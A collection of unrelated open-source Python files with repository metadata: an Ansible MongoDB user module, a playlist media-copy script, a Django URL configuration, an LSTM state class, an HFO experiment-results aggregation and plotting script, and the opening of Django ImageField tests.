    """Fail the module when the pymongo driver is too old for the server.

    See: https://docs.mongodb.com/ecosystem/drivers/driver-compatibility-reference/#python-driver-compatibility

    Args:
        module: Ansible module.
        client (cursor): Mongodb cursor on admin database.
    """
    loose_srv_version = LooseVersion(client.server_info()['version'])
    loose_driver_version = LooseVersion(PyMongoVersion)

    # Each message promises "pymongo X+", so version X itself must be
    # accepted: compare with '<' (the old '<=' rejected the exact
    # minimum version the message asks for).
    if loose_srv_version >= LooseVersion('3.2') and loose_driver_version < LooseVersion('3.2'):
        module.fail_json(msg=' (Note: you must use pymongo 3.2+ with MongoDB >= 3.2)')

    elif loose_srv_version >= LooseVersion('3.0') and loose_driver_version < LooseVersion('2.8'):
        module.fail_json(msg=' (Note: you must use pymongo 2.8+ with MongoDB 3.0)')

    elif loose_srv_version >= LooseVersion('2.6') and loose_driver_version < LooseVersion('2.7'):
        module.fail_json(msg=' (Note: you must use pymongo 2.7+ with MongoDB 2.6)')

    elif loose_driver_version < LooseVersion('2.5'):
        module.fail_json(msg=' (Note: you must be on mongodb 2.4+ and pymongo 2.5+ to use the roles param)')
def user_find(client, user, db_name):
    """Check if the user exists.

    Args:
        client (cursor): Mongodb cursor on admin database.
        user (str): User to check.
        db_name (str): User's database.

    Returns:
        dict: when user exists, False otherwise.
    """
    for candidate in client["admin"].system.users.find():
        if candidate['user'] != user:
            continue
        # Mongo 2.4 user documents carry no 'db' field; for those the
        # user name alone is a match.
        if 'db' not in candidate or candidate["db"] == db_name:
            return candidate
    return False
def user_add(module, client, db_name, user, password, roles):
    # pymongo's add_user is create-or-update, so we cannot tell whether
    # the user was created or merely updated without duplicating a lot
    # of pymongo's database.py logic.
    target = client[db_name]
    if roles is None:
        target.add_user(user, password, False)
    else:
        target.add_user(user, password, None, roles=roles)
def user_remove(module, client, db_name, user):
    """Drop *user* from *db_name*, honouring Ansible check mode.

    Exits the module with changed=False when the user is absent.
    """
    found = user_find(client, user, db_name)
    if not found:
        module.exit_json(changed=False, user=user)
    else:
        # Check mode: report the removal without performing it.
        if module.check_mode:
            module.exit_json(changed=True, user=user)
        client[db_name].remove_user(user)
def load_mongocnf():
    """Read login credentials from ~/.mongodb.cnf.

    Returns a dict with 'user' and 'password' keys, or False when the
    file is missing or lacks the [client] user/pass options.
    """
    creds_path = os.path.expanduser('~/.mongodb.cnf')
    parser = ConfigParser.RawConfigParser()
    try:
        parser.readfp(open(creds_path))
        return dict(
            user=parser.get('client', 'user'),
            password=parser.get('client', 'pass')
        )
    except (ConfigParser.NoOptionError, IOError):
        return False
def check_if_roles_changed(uinfo, roles, db_name):
    """Return True when the requested *roles* differ from *uinfo*'s roles.

    Oplog readers are the reason roles are compared as fully qualified
    {role, db} dicts: their credentials must live in the 'admin' db
    (the 'local' db is not replicated and cannot hold user credentials),
    while the role they carry targets 'local', e.g.:

        {
            "_id": "admin.oplog_reader",
            "user": "oplog_reader",
            "db": "admin",                     # <-- admin DB
            "roles": [
                {
                    "role": "read",
                    "db": "local"              # <-- local DB
                }
            ]
        }
    """
    def qualify(role):
        # A bare string implicitly targets the user's own database.
        if isinstance(role, basestring):
            return {"role": role, "db": db_name}
        return role

    wanted = sorted([qualify(entry) for entry in roles])
    current = sorted(uinfo.get('roles', []))
    return wanted != current
# =========================================
# Module execution.
#
def main():
    """Entry point: create, update, or remove a MongoDB user."""
    module = AnsibleModule(
        argument_spec = dict(
            login_user=dict(default=None),
            login_password=dict(default=None),
            login_host=dict(default='localhost'),
            login_port=dict(default='27017'),
            login_database=dict(default=None),
            replica_set=dict(default=None),
            database=dict(required=True, aliases=['db']),
            name=dict(required=True, aliases=['user']),
            password=dict(aliases=['pass']),
            ssl=dict(default=False, type='bool'),
            roles=dict(default=None, type='list'),
            state=dict(default='present', choices=['absent', 'present']),
            update_password=dict(default="always", choices=["always", "on_create"]),
            ssl_cert_reqs=dict(default='CERT_REQUIRED', choices=['CERT_NONE', 'CERT_OPTIONAL', 'CERT_REQUIRED']),
        ),
        supports_check_mode=True
    )

    if not pymongo_found:
        module.fail_json(msg='the python pymongo module is required')

    login_user = module.params['login_user']
    login_password = module.params['login_password']
    login_host = module.params['login_host']
    login_port = module.params['login_port']
    login_database = module.params['login_database']
    replica_set = module.params['replica_set']
    db_name = module.params['database']
    user = module.params['name']
    password = module.params['password']
    ssl = module.params['ssl']
    # NOTE(review): this local is assigned but never read afterwards;
    # the actual value is taken from module.params below — confirm it
    # can be dropped.
    ssl_cert_reqs = None
    roles = module.params['roles'] or []
    state = module.params['state']
    update_password = module.params['update_password']

    try:
        connection_params = {
            "host": login_host,
            "port": int(login_port),
        }
        if replica_set:
            connection_params["replicaset"] = replica_set
        if ssl:
            # Map the choice string (e.g. 'CERT_REQUIRED') onto the
            # matching constant of the ssl module.
            connection_params["ssl"] = ssl
            connection_params["ssl_cert_reqs"] = getattr(ssl_lib, module.params['ssl_cert_reqs'])
        client = MongoClient(**connection_params)

        # NOTE: this check must be done ASAP.
        # We don't need to be authenticated for it.
        check_compatibility(module, client)

        if login_user is None and login_password is None:
            # No credentials supplied: fall back to ~/.mongodb.cnf, if any.
            mongocnf_creds = load_mongocnf()
            if mongocnf_creds is not False:
                login_user = mongocnf_creds['user']
                login_password = mongocnf_creds['password']
        elif login_password is None or login_user is None:
            module.fail_json(msg='when supplying login arguments, both login_user and login_password must be provided')

        if login_user is not None and login_password is not None:
            client.admin.authenticate(login_user, login_password, source=login_database)
        elif LooseVersion(PyMongoVersion) >= LooseVersion('3.0'):
            # pymongo 3+ localhost exception: unauthenticated access is
            # only valid for creating the very first admin account.
            if db_name != "admin":
                module.fail_json(msg='The localhost login exception only allows the first admin account to be created')
            #else: this has to be the first admin user added

    except Exception:
        e = get_exception()
        module.fail_json(msg='unable to connect to database: %s' % str(e))

    if state == 'present':
        if password is None and update_password == 'always':
            module.fail_json(msg='password parameter required when adding a user unless update_password is set to on_create')

        try:
            uinfo = user_find(client, user, db_name)
            if update_password != 'always' and uinfo:
                # on_create: keep the stored password; only a role
                # change can make this run report 'changed'.
                password = None
                if not check_if_roles_changed(uinfo, roles, db_name):
                    module.exit_json(changed=False, user=user)

            if module.check_mode:
                module.exit_json(changed=True, user=user)

            user_add(module, client, db_name, user, password, roles)
        except Exception:
            e = get_exception()
            module.fail_json(msg='Unable to add or update user: %s' % str(e))

        # Here we can check password change if mongo provide a query for that : https://jira.mongodb.org/browse/SERVER-22848
        #newuinfo = user_find(client, user, db_name)
        #if uinfo['role'] == newuinfo['role'] and CheckPasswordHere:
        #    module.exit_json(changed=False, user=user)

    elif state == 'absent':
        try:
            user_remove(module, client, db_name, user)
        except Exception:
            e = get_exception()
            module.fail_json(msg='Unable to remove user: %s' % str(e))

    module.exit_json(changed=True, user=user)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.pycompat24 import get_exception
if __name__ == '__main__':
main()
|
{
"content_hash": "a7a39d4b49309d88b00b3eff7702b48b",
"timestamp": "",
"source": "github",
"line_count": 433,
"max_line_length": 255,
"avg_line_length": 34.595842956120094,
"alnum_prop": 0.6214285714285714,
"repo_name": "nwiizo/workspace_2017",
"id": "7fbcf332268a67c15340205695e4b5d0b45342b2",
"size": "15791",
"binary": false,
"copies": "11",
"ref": "refs/heads/master",
"path": "ansible-modules-extras/database/misc/mongodb_user.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "173"
},
{
"name": "C++",
"bytes": "7105"
},
{
"name": "CSS",
"bytes": "50021"
},
{
"name": "Go",
"bytes": "112005"
},
{
"name": "HTML",
"bytes": "66435"
},
{
"name": "JavaScript",
"bytes": "73266"
},
{
"name": "Makefile",
"bytes": "1227"
},
{
"name": "PHP",
"bytes": "3916"
},
{
"name": "PowerShell",
"bytes": "277598"
},
{
"name": "Python",
"bytes": "11925958"
},
{
"name": "Ruby",
"bytes": "3779"
},
{
"name": "Rust",
"bytes": "1484076"
},
{
"name": "Shell",
"bytes": "86558"
}
],
"symlink_target": ""
}
|
"""
#
# By: Charles Brandt [code at charlesbrandt dot com]
# On: *2013.06.05
# License: MIT
# Requires:
# medley, moments
# Description:
#
# be sure to edit source_root and destination_root before running, then run:
cd ~/public/repos/medley/scripts
python copy_playlist_media.py /media/path/to.m3u
copy_media(source, source_root, destination_root)
Afterwards, it is useful to run the following to update the original
playlist to the new location:

python /c/medley/scripts/filter_m3u_path.py /media/path/to.m3u /media/previous/base/:/media/new/base/
"""
from __future__ import print_function
from builtins import str
import os, sys, codecs
import re, shutil
from medley.formats import M3U
from sortable.path import Path
def usage():
    """Print this script's module docstring as help text."""
    help_text = __doc__
    print(help_text)
def copy_media(source, source_root, destination_root):
    """Copy every playlist item under source_root to destination_root,
    preserving the relative directory layout, along with any small
    sidecar files (non-movie, non-directory siblings) next to each item.
    """
    m3u = M3U(source)
    print("Source root:", source_root)
    print("Destination root:", destination_root)
    # NOTE(review): these counters are never updated or reported below —
    # confirm they can be removed.
    total_size = 0
    total_items = 0
    for item in m3u:
        full_path = os.path.join(item.path, item.filename)
        print("")
        print("Starting:", str(full_path))
        # NOTE(review): source_root is used as a regex pattern here;
        # paths containing regex metacharacters would misbehave — a
        # plain startswith() check may be intended.
        if re.match(str(source_root), str(full_path)):
            p = Path(full_path)
            relative = p.to_relative(source_root)
            print("relative pre:", relative)
            sparent = p.parent()
            destination = os.path.join(destination_root, relative)
            dpath = Path(destination)
            dparent = dpath.parent()
            print("relative post:", relative)
            print(sparent)
            print(destination)
            # Create the mirrored directory structure on demand.
            if not os.path.exists(str(dparent)):
                os.makedirs(str(dparent))
            # Skip files that were already copied on a previous run.
            if not os.path.exists(destination):
                p.copy(destination)
            else:
                print("already have: %s" % destination)
            # Bring along small sidecar files (covers, subtitles, ...)
            # living next to the media item.
            for option in os.listdir(str(sparent)):
                soption = os.path.join(str(sparent), option)
                spath = Path(soption)
                print(spath.type())
                if spath.type() != "Movie" and spath.type() != "Directory":
                    doption = os.path.join(str(dparent), option)
                    if not os.path.exists(doption):
                        print("copy here: %s, to %s" % (soption, doption))
                        shutil.copy(soption, doption)
    print()
def main():
    """Parse command-line arguments and run the playlist copy."""
    # this is used to distinguish actual media from markers
    source_root = '/media/source/'
    destination_root = '/media/destination'

    # requires that at least one argument is passed in to the script
    # itself (through sys.argv)
    if len(sys.argv) > 1:
        helps = ['--help', 'help', '-h']
        for i in helps:
            if i in sys.argv:
                usage()
                exit()

        source = sys.argv[1]
        if len(sys.argv) > 2:
            # NOTE(review): with exactly three arguments this raises
            # IndexError on sys.argv[3] — a len(sys.argv) > 3 guard
            # looks intended; confirm before changing behaviour.
            source_root = sys.argv[2]
            destination_root = sys.argv[3]
        copy_media(source, source_root, destination_root)
    else:
        usage()
        exit()
if __name__ == '__main__':
main()
|
{
"content_hash": "cf7b2e79b4d954cedf2a0906d1f4fe8a",
"timestamp": "",
"source": "github",
"line_count": 108,
"max_line_length": 101,
"avg_line_length": 28.546296296296298,
"alnum_prop": 0.5676289328576062,
"repo_name": "charlesbrandt/medley",
"id": "915eab8937b0a5134821cb7bcedea34238d18cda",
"size": "3105",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scripts/copy_playlist_media.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "19670"
},
{
"name": "JavaScript",
"bytes": "356728"
},
{
"name": "Python",
"bytes": "1017664"
},
{
"name": "Shell",
"bytes": "1569"
},
{
"name": "Smarty",
"bytes": "40284"
}
],
"symlink_target": ""
}
|
"""Copyright 2014 Cyrus Dasadia
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from django.conf.urls import patterns, include, url
from django.conf import settings

# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()

# Admin plus the JSON API; the apikey path component must be a
# UUID4-shaped hex string (8-4-4-4-12).
urlpatterns = patterns('',
    url(r'^admin/', include(admin.site.urls)),
    url(r'^api/(?P<apikey>[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})/runplugin',
        'webservice.api.run_plugin'),
    url(r'^api/(?P<apikey>[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})/getallplugins',
        'webservice.api.get_all_plugins'),
)

# Landing page and session management.
urlpatterns += patterns('',
    url(r'^$', 'webservice.views.plugin_views.view_all_plugins'),
    url(r'^login/$', 'webservice.views.auth_views.login_user'),
    url(r'^logout/$', 'webservice.views.auth_views.logout_user'),
)

# Plugin administration.
urlpatterns += patterns('',
    url(r'^plugins/$', 'webservice.views.plugin_views.view_all_plugins'),
    url(r'^plugins/add/$', 'webservice.views.plugin_views.add_new_plugin'),
    url(r'^plugins/edit/(?P<plugin_id>\d+)/$', 'webservice.views.plugin_views.edit_plugin'),
)

# API key administration.
urlpatterns += patterns('',
    url(r'^apikeys/$', 'webservice.views.apikey_views.view_all_apikeys'),
    url(r'^apikeys/add/$', 'webservice.views.apikey_views.add_new_key'),
    url(r'^apikeys/edit/(?P<apikey_id>\d+)/$', 'webservice.views.apikey_views.edit_key'),
)

# User administration.
urlpatterns += patterns('',
    url(r'^users/$', 'webservice.views.user_views.view_all_users'),
    url(r'^users/create/$', 'webservice.views.user_views.create_user'),
    url(r'^users/edit/(?P<user_id>\d+)/$', 'webservice.views.user_views.edit_user'),
    url(r'^users/toggle/$', 'webservice.views.user_views.toggle_user'),
    url(r'^users/view/(?P<user_id>\d+)/$', 'webservice.views.user_views.view_single_user'),
)

# Static content served straight out of settings.STATIC_FILES.
urlpatterns += patterns('',
    url(r'^content/(?P<path>.*)$', 'django.views.static.serve',
        {'document_root': settings.STATIC_FILES}),)
|
{
"content_hash": "ec886748cfc14cb7e1feb33c7ed36195",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 122,
"avg_line_length": 49.68333333333333,
"alnum_prop": 0.5585374035558538,
"repo_name": "CitoEngine/cito_plugin_server",
"id": "4fcdc20b6d0515c372e263aeac9d5fcadc5f2427",
"size": "2981",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cito_plugin_server/urls.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "51274"
},
{
"name": "HTML",
"bytes": "22568"
},
{
"name": "JavaScript",
"bytes": "75416"
},
{
"name": "Python",
"bytes": "49561"
},
{
"name": "Shell",
"bytes": "1218"
}
],
"symlink_target": ""
}
|
import numpy as np
class LSTM_state:
    """Container for the per-timestep state of a single LSTM unit."""

    def __init__(self, input_dim, output_dim, num_mem_cells):
        """All state vectors start as zeros (time t = 0)."""
        zeros = np.zeros
        # Concatenated input vector.
        self.xc = zeros(input_dim)
        # Gate activations: candidate (g), input (i), forget (f), output (o).
        self.g = zeros(num_mem_cells)
        self.i = zeros(num_mem_cells)
        self.f = zeros(num_mem_cells)
        self.o = zeros(num_mem_cells)
        # Cell state and hidden state.
        self.s = zeros(num_mem_cells)
        self.h = zeros(num_mem_cells)
        # Raw output and its probability distribution.
        self.y = zeros(output_dim)
        self.prob = zeros(output_dim)
|
{
"content_hash": "8e26f71c6d731a5aac33214d37a63051",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 61,
"avg_line_length": 32.05555555555556,
"alnum_prop": 0.5892547660311959,
"repo_name": "nrupatunga/multi-layer-lstm",
"id": "4bb5ab6797880dfb0421ed6d67f9d4c4f3c08a17",
"size": "577",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lstm/state.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "19834"
}
],
"symlink_target": ""
}
|
import argparse
import csv
import os
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
from collections import defaultdict
sns.set(style="darkgrid")
import scipy as sp
import scipy.stats
def collect_experiment_data(source='/', runs=1, servers=1, agents=3, hfo=True):
    """Merge per-agent evaluation result files under *source* into
    aggregate __EVAL_* CSV files (one column per usable run).

    A run is only counted when its budget column matches the length of
    the trial axis taken from the first readable file; mismatching runs
    are reported and skipped.
    """
    # load all agent data
    evalGoalPercentages = defaultdict(list)
    evalGoalTimes = defaultdict(list)
    evalUsedBudgets = defaultdict(list)
    evalSteps = defaultdict(list)
    evalTrials = np.array([])
    '''
    trainTrials = np.array([])
    trainFrames = defaultdict(list)
    trainScores = defaultdict(list)
    trainUsedBudgets = defaultdict(list)
    '''
    goodRuns = 0
    for server in range(servers):
        for agent in range(1, agents+1):
            for run in range(0, runs):
                # File name pattern: _<server>_<run>_AGENT_<n>_RESULTS_eval
                evalFile = os.path.join(source, "_"+ str(server) +"_"+ str(run+1) +"_AGENT_"+ str(agent) +"_RESULTS_eval")
                #print evalFile
                if os.path.isfile(evalFile):
                    if(hfo): #HFO experiment
                        try:
                            _et, _egp, _egt, _eub = np.loadtxt(open(evalFile, "rb"), skiprows=1, delimiter=",", unpack=True)
                        except:
                            continue
                        # The first readable file defines the trial axis.
                        if sum(evalTrials)==0:
                            evalTrials = _et
                        #print(sum(_eub.shape), sum(evalTrials.shape))
                        if sum(_eub.shape) == sum(evalTrials.shape):
                            goodRuns += 1
                            for trial in _et:
                                evalGoalPercentages[(agent,trial)].append(_egp)
                                evalGoalTimes[(agent,trial)].append(_egt)
                                evalUsedBudgets[(agent,trial)].append(_eub)
                        else:
                            print("Error " + str(run+1) + " - "+ str(sum(_eub.shape))+" , "+str(sum(evalTrials.shape)))
                    else:
                        # Non-HFO experiment: steps-to-capture instead of goals.
                        try:
                            _et, _es, _eub = np.loadtxt(open(evalFile, "rb"), skiprows=1, delimiter=",", unpack=True)
                        except:
                            continue
                        if sum(evalTrials)==0:
                            evalTrials = _et
                        #print(sum(_eub.shape), sum(evalTrials.shape))
                        if sum(_eub.shape) == sum(evalTrials.shape):
                            goodRuns += 1
                            for trial in _et:
                                evalSteps[(agent,trial)].append(_es)
                                evalUsedBudgets[(agent,trial)].append(_eub)
                        else:
                            print("Error " + str(run+1) + " - "+ str(sum(_eub.shape))+" , "+str(sum(evalTrials.shape)))
    # goodRuns was incremented once per agent, so divide it back down.
    goodRuns = int(goodRuns / agents)
    print('Could use %d runs from expected %d' % (goodRuns, runs))
    '''
    trainFile = os.path.join(source, "_"+ str(run) +"_"+ str(server) +"_AGENT_"+ str(agent) +"_RESULTS_train")
    print trainFile
    _tt, _tf, _ts, _tub = np.loadtxt(open(trainFile, "rb"), skiprows=1, delimiter=",", unpack=True)
    if sum(trainTrials)==0:
        trainTrials = _tt
    for trial in _tt:
        trainFrames[(agent,trial)].append(_tf)
        trainScores[(agent,trial)].append(_ts)
        trainUsedBudgets[(agent,trial)].append(_tub)
    for agent in range(1, agents+1):
        for trial in evalTrials:
            # build summaries
            evalGoalPercentages[(agent,trial)] = [summarize_data(evalGoalPercentages[(agent,trial)])]
            evalGoalTimes[(agent,trial)] = [summarize_data(evalGoalTimes[(agent,trial)])]
            evalUsedBudgets[(agent,trial)] = [summarize_data(evalUsedBudgets[(agent,trial)])]
        for trial in trainTrials:
            # build summaries
            trainFrames[(agent,trial)] = [summarize_data(trainFrames[(agent,trial)])]
            trainScores[(agent,trial)] = [summarize_data(trainScores[(agent,trial)])]
            trainUsedBudgets[(agent,trial)] = [summarize_data(trainUsedBudgets[(agent,trial)])]
    '''
    #print('len(evalGoalPercentages) %d --> %s %s' % (len(evalGoalPercentages), str(type(evalGoalPercentages[(1,20)])), str(evalGoalPercentages[(1,20)]) ))
    #print('len(evalGoalTimes) %d --> %s %s' % (len(evalGoalTimes), str(type(evalGoalTimes[(1,20)])), str(evalGoalTimes[(1,20)]) ))
    print('len(evalUsedBudgets) %d --> %s %s' % (len(evalUsedBudgets), str(type(evalUsedBudgets[(1,20)])), str(len(evalUsedBudgets[(1,10)])) ))
    # Header row: Trial, Run1, Run2, ...
    headerLine = []
    headerLine.append("Trial")
    for run in range(1, runs+1):
        headerLine.append("Run"+str(run))
    if(hfo):
        with open(os.path.join(source, "__EVAL_goalpercentages"), 'wb') as csvfile:
            csvwriter = csv.writer(csvfile)
            csvwriter.writerow((headerLine))
            csvfile.flush()
            for i in range(sum(evalTrials.shape)):
                newrow = [evalTrials[i]]
                # Agent 1's series is representative for goal metrics.
                for j in evalGoalPercentages[(1,evalTrials[i])]:
                    newrow.append("{:.2f}".format(j[i]))
                csvwriter.writerow((newrow))
                csvfile.flush()
        with open(os.path.join(source, "__EVAL_goaltimes"), 'wb') as csvfile:
            csvwriter = csv.writer(csvfile)
            csvwriter.writerow((headerLine))
            csvfile.flush()
            for i in range(sum(evalTrials.shape)):
                newrow = [evalTrials[i]]
                for j in evalGoalTimes[(1,evalTrials[i])]:
                    newrow.append("{:.2f}".format(j[i]))
                csvwriter.writerow((newrow))
                csvfile.flush()
    else:
        with open(os.path.join(source, "__EVAL_stepscaptured"), 'wb') as csvfile:
            csvwriter = csv.writer(csvfile)
            csvwriter.writerow((headerLine))
            csvfile.flush()
            for i in range(sum(evalTrials.shape)):
                newrow = [evalTrials[i]]
                for j in evalSteps[(1,evalTrials[i])]:
                    newrow.append("{:.2f}".format(j[i]))
                csvwriter.writerow((newrow))
                csvfile.flush()
    # Budgets are written for both experiment kinds, averaged over agents.
    with open(os.path.join(source, "__EVAL_budgets"), 'wb') as csvfile:
        csvwriter = csv.writer(csvfile)
        csvwriter.writerow((headerLine))
        csvfile.flush()
        allBudgets = []
        for trial in range(sum(evalTrials.shape)):
            budgetAvg = [0]* (goodRuns)
            for agent in range(1,agents+1):
                for i in range(len(evalUsedBudgets[(agent,evalTrials[trial])])):
                    #try:
                    budgetAvg[i] += evalUsedBudgets[(agent,evalTrials[trial])][i]/agents
                    #except:
                    #    print i, len(evalUsedBudgets[(agent,evalTrials[trial])])
            allBudgets.append(budgetAvg)
        for i in range(sum(evalTrials.shape)):
            newrow = [evalTrials[i]]
            #print allBudgets[i]
            for j in allBudgets[i]:
                #print(i,j[i])
                newrow.append("{:.2f}".format(j[i]))
            csvwriter.writerow((newrow))
            csvfile.flush()
def summarize_data(data, confidence=0.95):
    """Column-wise mean and Student-t confidence band of *data*.

    Args:
        data: sequence of equal-length rows (one row per run).
        confidence: two-sided confidence level, default 0.95.

    Returns:
        np.ndarray of shape (3, columns): [mean, mean - h, mean + h],
        where h is the half-width of the confidence interval.
    """
    n = len(data)
    mean = np.mean(data, axis=0)
    stderr = scipy.stats.sem(data, axis=0)
    # Use the public ppf() instead of the private _ppf(); for the
    # standard t distribution they agree, but _ppf is internal API and
    # skips argument validation.
    h = stderr * scipy.stats.t.ppf((1 + confidence) / 2., n - 1)
    return np.asarray([mean, mean - h, mean + h])
def summarize_experiment_data(source, hfo=True):
    """Turn each __EVAL_* CSV under *source* into a __SUMMARY_* CSV with
    columns: trial, mean, ci_down, ci_up (95% confidence band)."""
    if hfo:
        values = ["__EVAL_goalpercentages", "__EVAL_goaltimes", "__EVAL_budgets"]
    else:
        values = ["__EVAL_stepscaptured", "__EVAL_budgets"]
    #values = ["__EVAL_goalpercentages", "__EVAL_goaltimes"]
    for value in values:
        evalFile = os.path.join(source, value)
        #print(evalFile)
        evalFileContent = np.loadtxt(open(evalFile, "rb"), skiprows=1, delimiter=",", unpack=True)
        # Row 0 is the trial axis; the remaining rows are one per run.
        trials = evalFileContent[0]
        data = evalFileContent[1:]
        update = summarize_data(data)
        headerLine = []
        headerLine.append("trial")
        headerLine.append("mean")
        headerLine.append("ci_down")
        headerLine.append("ci_up")
        # Write next to the input with EVAL replaced by SUMMARY.
        value = value.replace("EVAL","SUMMARY")
        with open(os.path.join(source, value), 'wb') as csvfile:
            csvwriter = csv.writer(csvfile)
            csvwriter.writerow((headerLine))
            csvfile.flush()
            for i in range(sum(trials.shape)):
                newrow = [trials[i]]
                for j in update.T[i]:
                    newrow.append("{:.2f}".format(j))
                csvwriter.writerow((newrow))
                csvfile.flush()
def _plot_summary_curve(src, label, what, ci, fill_color, line_color,
                        xMin, xMax, yMin, yMax):
    # One summary file: row 0 is the trial axis, rows 1-3 are the mean
    # and the lower/upper confidence bounds (see summarize_experiment_data).
    content = np.loadtxt(open(os.path.join(src, what), "rb"),
                         skiprows=1, delimiter=",", unpack=True)
    x = content[0]
    mean, ci_down, ci_up = content[1], content[2], content[3]
    # Budget curves never get a confidence band.
    if what != "__SUMMARY_budgets" and ci:
        plt.fill_between(x, mean, ci_down, facecolor=fill_color, alpha=0.2)
        plt.fill_between(x, mean, ci_up, facecolor=fill_color, alpha=0.2)
    plt.plot(x, mean, label=label, color=line_color, linewidth=4.0)
    if yMin is not None:
        plt.ylim([yMin, yMax])
    if xMin is not None:
        plt.xlim([xMin, xMax])


def draw_graph(source1=None, name1="Algo1",
               source2=None, name2="Algo2",
               source3=None, name3="Algo3",
               source4=None, name4="Algo4",
               source5=None, name5="Algo5",
               source6=None, name6="Algo5",
               what="__SUMMARY_goalpercentages", ci=True,
               # Parameters introduced to allow plot control
               xMin=None, xMax=None, yMin=None, yMax=None):
    """Plot up to six experiment summary curves in one figure.

    Each sourceN is a directory containing the __SUMMARY_* file named by
    *what*; None slots are skipped. ci toggles the shaded confidence
    band (never drawn for budgets). xMin/xMax/yMin/yMax optionally clamp
    the axes.
    """
    plt.figure(figsize=(20, 6), dpi=300)
    # (fill colour, line colour) per slot; slot 6 keeps the original
    # black fill with a grey line.
    slots = [(source1, name1, 'blue', 'blue'),
             (source2, name2, 'green', 'green'),
             (source3, name3, 'red', 'red'),
             (source4, name4, 'yellow', 'yellow'),
             (source5, name5, 'black', 'black'),
             (source6, name6, 'black', '#999999')]
    for src, label, fill_color, line_color in slots:
        if src is not None:
            _plot_summary_curve(src, label, what, ci, fill_color,
                                line_color, xMin, xMax, yMin, yMax)
    y_labels = {"__SUMMARY_goalpercentages": 'Goal %',
                "__SUMMARY_goaltimes": 'Frames',
                "__SUMMARY_budgets": 'Budget',
                "__SUMMARY_stepscaptured": 'Steps until captured'}
    if what in y_labels:
        plt.ylabel(y_labels[what], fontsize=20, fontweight='bold')
    else:
        plt.ylabel('Unknown')
    plt.xlabel('Training Episodes', fontsize=20, fontweight='bold')
    # 'middle right' is not a recognised matplotlib legend location and
    # raises/warns on modern versions; 'center right' is the valid name
    # for the intended placement.
    plt.legend(loc='center right', prop={'size': 18, 'weight': 'bold'})
    plt.tick_params(axis='both', which='major', labelsize=18)
    plt.show()
def get_args(argv=None):
    """Parse command-line options for the experiment evaluation.

    Args:
        argv: optional list of argument strings. When ``None`` (the
            default, matching the original no-argument call sites),
            argparse falls back to ``sys.argv[1:]``.

    Returns:
        argparse.Namespace with:
            source -- experiment results directory (``-s``/``--source``).
            runs   -- number of runs to aggregate (``-r``/``--runs``, default 5).
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-s', '--source',
                        default='/home/ruben/playground/HFO/experiments/EVAL/2016_09_12-14.38.02_SARSA_1_5')
    parser.add_argument('-r', '--runs', type=int, default=5)
    return parser.parse_args(argv)
def main():
    """Entry point: collect and summarize experiment data per CLI options."""
    args = get_args()
    collect_experiment_data(args.source, runs=args.runs)
    summarize_experiment_data(args.source)
    # Optional plots, disabled by default:
    # draw_graph(source1=args.source)
    # draw_graph(source1=args.source, what="__SUMMARY_goaltimes")
    # draw_graph(source1=args.source, what="__SUMMARY_budgets")
# Run the evaluation pipeline only when invoked as a script.
if __name__ == '__main__':
    main()
|
{
"content_hash": "24bb107636f633614cb165b88ab8b4f8",
"timestamp": "",
"source": "github",
"line_count": 332,
"max_line_length": 155,
"avg_line_length": 44.96686746987952,
"alnum_prop": 0.5558979168062161,
"repo_name": "cowhi/HFO",
"id": "a7c92168310182bf54c6c23d51c0651f58b81f35",
"size": "14929",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "experiments/exp_utils.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "1230076"
},
{
"name": "CMake",
"bytes": "8931"
},
{
"name": "Jupyter Notebook",
"bytes": "1684588"
},
{
"name": "Makefile",
"bytes": "7718"
},
{
"name": "Python",
"bytes": "218145"
},
{
"name": "Shell",
"bytes": "41259"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
import os
import shutil
from unittest import skipIf
from django.core.exceptions import ImproperlyConfigured
from django.core.files import File
from django.core.files.images import ImageFile
from django.test import TestCase
from django.test.testcases import SerializeMixin
from django.utils._os import upath
# Importing the test models requires Pillow (via ImageField); when Pillow is
# missing the models module raises ImproperlyConfigured, in which case every
# test class below is skipped by its @skipIf decorator.
try:
    from .models import Image
except ImproperlyConfigured:
    Image = None

if Image:
    from .models import (
        Person, PersonWithHeight, PersonWithHeightAndWidth,
        PersonDimensionsFirst, PersonTwoImages, TestImageFieldFile,
    )
    from .models import temp_storage_dir
else:
    # Pillow not available, create dummy classes (tests will be skipped anyway)
    class Person():
        pass
    PersonWithHeight = PersonWithHeightAndWidth = PersonDimensionsFirst = Person
    PersonTwoImages = Person
class ImageFieldTestMixin(SerializeMixin):
    """
    Mixin providing the shared fixture and assertion helper for the
    ImageField test classes below.
    """
    lockfile = __file__

    # Person model to use for tests.
    PersonModel = PersonWithHeightAndWidth
    # File class to use for file instances.
    File = ImageFile

    def setUp(self):
        """
        Recreate a pristine temp storage directory for the model and open
        the two fixture images (4x8 and 8x4 pixels) as self.file1/self.file2.
        """
        if os.path.exists(temp_storage_dir):
            shutil.rmtree(temp_storage_dir)
        os.mkdir(temp_storage_dir)
        tests_dir = os.path.dirname(upath(__file__))
